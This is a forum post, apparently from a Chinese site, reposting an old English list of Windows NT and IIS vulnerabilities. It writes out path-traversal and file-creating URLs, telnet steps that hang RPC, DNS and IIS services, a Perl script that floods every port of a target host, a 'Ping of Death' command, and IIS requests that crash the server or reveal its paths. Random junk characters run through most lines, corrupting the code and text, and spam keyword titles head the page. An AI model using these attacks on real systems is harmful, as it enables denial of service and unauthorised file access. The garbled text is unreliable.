天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

  • 
    
    <delect id="ixd07"></delect>

       找回密碼
       注冊(cè)

      QQ登錄

      只需一步,快速開始

      NT的漏洞及描述(英文)

      [復(fù)制鏈接]
      1#
      發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序?yàn)g覽 |閱讀模式
      受影響系統(tǒng):4.0,iis 1.0/ E0 {! g% v& q
      A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.7 |( W% {6 j. L9 @

      & f8 y, W0 ~: R* s8 ^, W8 c6 ^A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
      $ B7 Q; B6 C# P- O! n2 g. O, r3 n+ [/ Z9 Z8 U
      By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
      1 L. m7 ]" Y8 p! E& h
      5 L! u  V" d- C$ P--------------------------------------------------------------------
      * C0 O+ V, m( a% B+ t& U/ e+ e  {  _1 B6 [& V: A
      受影響系統(tǒng):4.0
      + h# |: L6 M9 z! q. `A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
      , L; p6 ^7 Q. P( J
      4 i* }. n# C$ `( S9 xIf the file 'target.bat' exists, the file will be truncated.5 E# f4 L* j* t" }/ U# ~
      + E$ }1 M4 y2 c7 z! b; }
      7 K3 Y& U# a. @/ Q; I1 t3 z3 W0 J
      A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.- \# T/ N+ d8 [' {

      ! Q5 j5 G  b/ B$ p& S. H4 K----------------------------------------------------------------------. Y% }+ B( n) t# k3 E
      0 Q; i$ l$ I9 ~
      受影響系統(tǒng):3.51,4.0
      5 ~# T* y) y! g. fMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
      ( `. a$ U- O% _! E0 x) R+ ^" `) Q! T  K3 a
      The following steps;
      ; A; O9 S/ G/ k. q" `7 d1 @9 D$ O5 m2 b
      Telnet to an NT 4.0 system on port 135 / \# {4 B- }9 b. H* i7 N! l( u3 `
      Type about 10 characters followed by a <CR> 7 O, `2 W+ q+ Y9 J5 N# A
      Exit Telnet ! V4 F- c+ b) ]' t4 a! g7 B
      results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
      $ c2 Y) A+ F; o6 K0 c" w- ^9 m$ K) j7 A/ L. o( I, ?0 Y
      When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.* [5 C7 u7 A3 `( c/ J# B

      1 S$ n6 [, d* E" t: B2 \# a' CThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted." T: f5 h" R  ~0 K& }
      " |+ p' p2 P- F) O- P7 z9 A2 h" B) z; l
      If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.5 o9 y+ O) f- Z3 [( k+ K
      7 M2 {; X! `7 q" s
      The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
      # I) _# ?2 m5 H( N' v9 i" M9 @2 S8 D) H8 F/ d! X; w+ @7 a
      /*begin poke code*/
      4 @6 o' k$ |# |( q1 [
      , ?+ ?9 M( e' Suse Socket;8 h6 i4 d' M$ ^; H0 D+ n& P
      use FileHandle;
      4 S- b$ \# J- D+ [0 Srequire "chat2.pl";
      0 U. Y! I1 e6 i  P
        g, Y1 }7 Q4 W- F* x# v+ P4 |$systemname = $ARGV[0] && shift;
      ( i+ `6 q, h7 _0 j9 `# X( f: X- j7 W  J; S
      $verbose = 1; # tell me what you're hitting8 z# o% q% h/ W* k5 {. c% u
      $knownports = 1; # don't hit known problem ports
      " H7 Y2 s6 z" e+ Kfor ($port = $0; $port<65535; $port++) + c' g2 {& Y: _1 S# U( W& Z0 b
      {+ |' a( ]) a( b. I
      # m8 S- e; {, m4 `: k7 ?& W! M
      & K5 p( v9 |, {# n% y
      if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
      - F  H4 [0 n4 C9 V" Wnext;
      ) A- {$ f! e. z0 L) }3 |}
      $ G" b" P- d0 w$fh = chat::open_port($systemname, $port);) m0 v! }; l. F
      chat::print ($fh,"This is about ten characters or more");1 u9 H) S4 e9 X+ B7 p
      if ($verbose) {
      3 h; {' \0 c5 l" j. ~" aprint "Trying port: $port\n";5 n$ y/ E2 X7 K0 S) G
      }
      , X2 w8 F$ l+ {& dchat::close($fh);; b9 C& z. i5 v' x/ q* L1 @
      % ^% @5 h1 h& c$ k% R
      }
      ' ~# d5 Z$ @7 W# X# w$ ^% e, U* ]2 D1 ]+ m8 A0 K
      , l  z+ N6 G. P% Q/ A5 E+ b- h
      /*end poke code*/: n1 L) n( \% ?' R+ X7 Y
      . d0 a) s  L* Y1 Y
      Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername. g! d. s% `  ]2 {( c1 D/ ]
      ! i3 }4 S; i- E
      --------------------------------------------------------------------------------
      % E" T( V" A  ^# ]1 Z* j! y' z( G  H! f7 p# J
      受影響系統(tǒng):4.0+ j+ ?7 [- H. i& z1 D1 h' _0 J
      Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.0 J. b5 Y- x. D! \! `" }- `1 f

      / `' E. A/ A  Q& I* aThis attack causes Dr. Watson to display an alert window and to log an error:
      / `; X  R( [, {  u/ n0 B/ H! R7 t; p- A
      "The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
      1 D1 C$ z/ l8 f9 z% G, L8 ?$ |
      ! s; P3 C' J( {" p  q$ b1 x3 l$ p6 ~--------------------------------------------------------------------------------
      " c) A; L, a  _, }1 o5 }+ F/ }+ f0 c  l. s+ C2 n3 G+ O
      受影響系統(tǒng):3.51,4.0
      - a! d% L: j+ K( Y! b8 mLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:) z+ R2 K9 W; Z+ n/ m' ^
      6 a8 ~' ^  @3 s$ N
      STOP: 0X0000001E
      # J6 a2 y/ @6 Z9 tKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS8 x# K: t0 o; R) r' o8 z+ \2 q

      ; }" t4 [# q3 ?-OR-" ^' S, u& e, r  v( q
      1 K2 d# d% C/ k4 B  M
      STOP: 0x0000000A
      / J7 N. r0 v, ]: G" k) Y  OIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS/ |# w6 e: m4 ?# b4 [' E
      ( V8 w0 k6 m7 h1 g: P! t# n+ E
      NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
      % s6 n' r: `( b* \1 n" i
      4 P2 {" t, v2 O4 s0 m* W--------------------------------------------------------------------------------1 G7 J: Z! V" B0 Z$ u7 z

      ' i( u$ z- v# ^9 b% h3 M7 ?Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
      ! u: X( J% E7 U1 r' h/ f* {4 ^7 R& g# l# `0 K* R; e
      --------------------------------------------------------  k/ D. V/ _. k) ~9 c
      9 s$ I4 ]" j& v/ k; C5 ?9 v
      IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
      您需要登錄后才可以回帖 登錄 | 注冊(cè)

      本版積分規(guī)則

      QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號(hào)-1 )

      GMT+8, 2025-8-10 02:38

      Powered by Discuz! X3.5

      © 2001-2025 Discuz! Team.

      快速回復(fù) 返回頂部 返回列表